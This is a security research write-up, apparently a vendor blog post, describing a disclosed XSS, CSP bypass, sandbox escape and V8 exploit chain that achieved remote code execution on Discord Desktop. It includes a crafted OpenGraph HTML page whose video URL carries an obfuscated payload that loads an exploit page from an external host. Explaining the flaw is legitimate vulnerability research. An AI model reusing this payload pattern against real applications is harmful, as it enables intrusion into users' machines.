How a chain of XSS, CSP bypass, and Electron misconfigs led to full remote code execution on Discord Desktop. We walk through the technical details, steps, and lessons learned.

Note Want to secure your Electron or JavaScript application? Reach out to us at hello@hacktron.ai or visit https://hacktron.ai to learn more.

Background & how Electrovolt started

During our prototype pollution research, BlackFan reported an XSS to a bug bounty program. The XSS report wasn’t getting much attention and had been in a triaged state for two months with no response. The program scope included a desktop application as well, which made me curious if I could exploit this to get RCE on the desktop app. Although the desktop app was not Electron-based, I was still able to achieve RCE with ptrYudai’s help. The program noticed our escalation to RCE and immediately fixed the issue and paid out a nice bounty. With such results, I decided to start focusing on hacking desktop applications.

Targeting Discord desktop

Obviously, I decided to target the Discord desktop application because it was being used for our Prototype Pollution research collaboration. Discord uses ElectronJS for their desktop application, and to be honest, I didn’t really know much about ElectronJS at that time. However, I thought it was just a JavaScript application and started learning and hacking. The interesting thing about ElectronJS applications is that you can extract the JavaScript used to build the application using the command below. The one thing I always love to do is source code auditing —— it makes things easier compared to black-box testing. When it comes to JavaScript hacking, most of the time you can get the source code, whether it’s a web application frontend or JS-based desktop applications:

Terminal window $ npx asar extract /Applications/Discord.app/Contents/Resources/app.asar ./

After extracting, I realized that it would not be easy to achieve remote code execution using the usual Electron misconfigurations because, as we can see, nodeIntegration is disabled and contextIsolation is enabled. Masato previously compromised Discord when contextIsolation was disabled —— you can read more details about it in his blog, which is also an excellent primer for working on ElectronJS applications.

1 const mainWindowOptions = { 2 title : 'Discord' , 3 webPreferences : { 4 blinkFeatures : 'EnumerateDevices,AudioOutputDevices' , 5 nodeIntegration : false , 6 preload : _path . default . join (__dirname, 'mainScreenPreload.js' ), 7 nativeWindowOpen : true , 8 enableRemoteModule : false , 9 spellcheck : true , 10 contextIsolation : true , 11 }, 12 }

So far, the webPreferences configuration looks secure based on previous RCEs targeting Electron applications. However, there is one important webPreference missing: the sandbox flag. If sandbox is not set to true, the app runs without sandboxing by default. I also checked the Electron version, which was 9-x-y using the relatively old Chromium Chrome/83.0.4103.122 . It became apparent that achieving RCE with that version of Chrome would not be particularly difficult, as there were quite a few V8 bugs available in the Chromium patches.

XSS discovery in Discord embeds

I decided to find XSS on Discord Desktop. Since the Discord frontend uses ReactJS, after a few days I realized that finding XSS on the main Discord app was challenging, and there were no interesting ReactJS sinks as far as I could see. Taking inspiration from Masato’s blog, I started looking for XSS on Discord embeds.

Vimeo XSS & CSP bypass

While I was trying to find XSS on Discord embeds, I worked with Harsh Jaiswal (@rootxharsh) to find an XSS in Discord embeds. After some work, we managed to get an XSS on one of the Vimeo endpoints. However, due to Vimeo’s CSP implementation, I had difficulties executing an external script to trigger the exploit. I faced issues loading an external script and running the exploit because of the CSP. The Vimeo endpoint had the following CSP:

1 Content - Security - Policy : default- src 'none' ; script - src 'unsafe-inline'

Interestingly, since the Discord Chrome version was old, I decided to use a CSP bypass I had previously read about on crbug.com. This allowed me to load an external iframe in the Vimeo embed by bypassing the frame-src restriction.

By hosting the following HTML and sharing the link in a Discord chat, an alert box would pop up in the Vimeo embed:

1 <! DOCTYPE html > 2 < html > 3 < head > 4 < meta charset = "utf-8" /> 5 < meta property = "og:title" content = "RCE DEMO" /> 6 < meta property = "og:description" content = "asdasdf<b>Description</b & lt ; >" /> 7 < meta property = "og:type" content = "video" /> 8 < meta 9 property = "og:image" 10 content = "https://pbs.twimg.com/profile_images/1313475569426857988/Q0I0VkmF_400x400.jpg" 11 /> 12 < meta property = "og:image:type" content = "image/jpg" /> 13 < meta property = "og:image:width" content = "1280" /> 14 < meta property = "og:image:height" content = "720" /> 15 < meta 16 property = "og:video:url" 17 content = "https://redacted/redacted?redacted=x&redacted=javascript://asd.com?f=1%27%250awindow.open(atob(location.search.split(String.fromCharCode(0x26))[2].split(String.fromCharCode(0x3d))[1].substr(5).replace(location.search.split(String.fromCharCode(0x26))[2].split(String.fromCharCode(0x3d))[1].substr(0,5),String.fromCharCode(0x2b)).replace(location.search.split(String.fromCharCode(0x26))[2].split(String.fromCharCode(0x3d))[1].substr(0,5),String.fromCharCode(0x2b))),location.search.split(String.fromCharCode(0x26))[2].split(String.fromCharCode(0x3d))[1].substr(0,5))//&payload=_selfamF2YXNjcmlwdDonPGlmcmFtZSBzcmNkb2M9IjxpZnJhbWUgc3JjPVwnaHR0cHM6Ly9jdGYuczFyMXVzLm5pbmphL2Rpc2NvcmQvZXhwLmh0bWxcJzs_selfPC9pZnJhbWU_selfIj4n" 18 /> 19 < meta property = "og:video:type" content = "text/html" /> 20 < meta property = "og:video:width" content = "1280" /> 21 < meta property = "og:video:height" content = "720" /> 22 </ head > 23 < body > 24 test 25 </ body > 26 </ html >

Sandbox bypass via new-window

I was excited to run the V8 exploit in the Vimeo embed and pop the calculator, but there was a catch: all the iframes in the Discord Desktop Application were running in sandbox mode. Apparently, Electron enables sandboxing by default for all embeds. At first, I thought this was the end of the story.

While I was discussing this issue in the Discord channel, Masato pointed out that it was possible to open a new window due to insufficient restrictions on the new-window event in Discord.

Unfortunately, even after opening the exploit in a new window, the sandbox was still enabled. I wasn’t sure why, but after some time, I realized that redirecting to a different origin would clear the sandbox. Perhaps the renderer process of the Vimeo embed was reused for the new window, and after the redirect, a new process was created without sandboxing.

V8 exploit

At that time, I wasn’t very experienced at writing V8 exploits, so I asked my CTF friend ptrYudai to help me write one using crbug.com/1196683. After a few trials and errors, we finally managed to pop the calculator.

Proof of concept

Here is the PoC that pops the calculator:

Remediation